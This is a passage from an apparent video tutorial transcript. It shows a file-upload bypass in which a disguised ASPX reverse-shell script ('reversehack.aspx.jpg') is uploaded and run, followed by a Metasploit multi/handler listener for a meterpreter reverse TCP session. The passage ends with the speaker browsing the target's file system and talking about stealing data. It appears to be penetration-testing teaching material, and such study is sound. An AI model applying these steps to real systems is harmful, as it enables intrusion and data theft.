So we can go back at this point and upload that file. So I will go Browse, and I'm going to upload that file we just created. And I click Upload, and it tells me successfully, your file was saved as reversehack.aspx.jpg. So when I click on this file, it's going to execute that script and connect back. But before I do that, I need to set up a listener in Metasploit. So I will run the command msf-console. And that starts Metasploit for us. To set up a listener, we're going to say use exploit/multi/handler. And that will set up a handler for our connection. I'm going to set up the payload to match the payload that I created in the ASP script. So I'm going to say set payload Windows/meterpreter/reverse TCP. And then I'm going to run the command show options. And we can see that these are the options we need to set in order to run this exploit. Some of it's already set for us. If we look at the local port, it's already set to 4444, which is what we set in our ASP script, so that's good to go. But we do need to set the lhost. So that is going to be set to the IP address of our local machine. So I will run the command set lhost 192.168.2.9, which is our IP address of the Kali Linux. And then I'll run show options again. And we can see now the IP address is set. So I'll clean up my terminal. And now I can run the command exploit to set up my listener. And we can see it started a reverse TCP handler on 192.168.2.9 on the port 4444. And at this point, I'm ready to go back to my website and execute my script. Now I'll click on this file. And to the naked eye, everything appears normal. We have opened up a picture has loaded, nothing malicious seems to have happened. But we know that under the hood, our malicious script has run. So I will now minimize this and go back to our listener, and we see that it's been connected to, and we have a meterpreter session now. So I will change to the root directory, and then I will do a ls. And we see this is not a directory on our machine, this is a directory on the target. And we have access to their file systems. We can start to steal data, upload more malicious files, really do whatever malicious acts we want to do. And the target is completely